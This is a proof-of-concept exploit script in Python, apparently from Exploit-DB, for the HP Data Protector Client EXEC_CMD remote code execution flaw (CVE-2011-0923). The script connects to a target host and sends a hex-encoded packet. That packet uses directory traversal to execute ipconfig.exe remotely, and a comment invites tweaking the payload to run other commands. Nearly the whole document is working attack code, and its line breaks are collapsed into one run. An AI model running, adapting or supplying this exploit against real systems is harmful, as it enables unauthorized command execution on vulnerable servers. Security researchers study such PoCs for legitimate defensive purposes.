# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)# Date: 2011-05-28# Author: fdisk (@fdiskyou)# e-mail: fdiskyou at deniable.org# Version: 6.11# Tested on: Windows 2003 Server SP2 en# CVE: CVE-2011-0923# Notes: ZDI-11-055# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143## Greetz to all the Exploit-DB Dev Team.import socketimport sysif len(sys.argv) != 3: print "Usage: ./ZDI-11-055.py <Target IP> <Port>" sys.exit(1)host = sys.argv[1]port = int(sys.argv[2])# The following PoC takes advantage of a Directory Path Traversal to execute ipconfig.exe on the remote host. # Tweak payload to better suit your needs.payload = ("/x00/x00/x00/xa4/x20/x32/x00/x20/x66/x64/x69/x73/x6b/x79/x6f/x75""/x00/x20/x30/x00/x20/x53/x59/x53/x54/x45/x4d/x00/x20/x66/x64/x69""/x73/x6b/x79/x6f/x75/x00/x20/x43/x00/x20/x32/x30/x00/x20/x66/x64""/x69/x73/x6b/x79/x6f/x75/x00/x20/x50/x6f/x63/x00/x20/x4e/x54/x41""/x55/x54/x48/x4f/x52/x49/x54/x59/x00/x20/x4e/x54/x41/x55/x54/x48""/x4f/x52/x49/x54/x59/x00/x20/x4e/x54/x41/x55/x54/x48/x4f/x52/x49""/x54/x59/x00/x20/x30/x00/x20/x30/x00/x20/x2e/x2e/x2f/x2e/x2e/x2f""/x2e/x2e/x2f/x2e/x2e/x2f/x2e/x2e/x2f/x2e/x2e/x2f/x2e/x2e/x2f/x2e""/x2e/x2f/x2e/x2e/x2f/x2e/x2e/x2f/x5c/x77/x69/x6e/x64/x6f/x77/x73""/x5c/x73/x79/x73/x74/x65/x6d/x33/x32/x5c/x69/x70/x63/x6f/x6e/x66""/x69/x67/x2e/x65/x78/x65/x00/x00")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))print "Sending payload"s.send(payload)while 1: data = s.recv(4096) if data: print data else: breaks.close()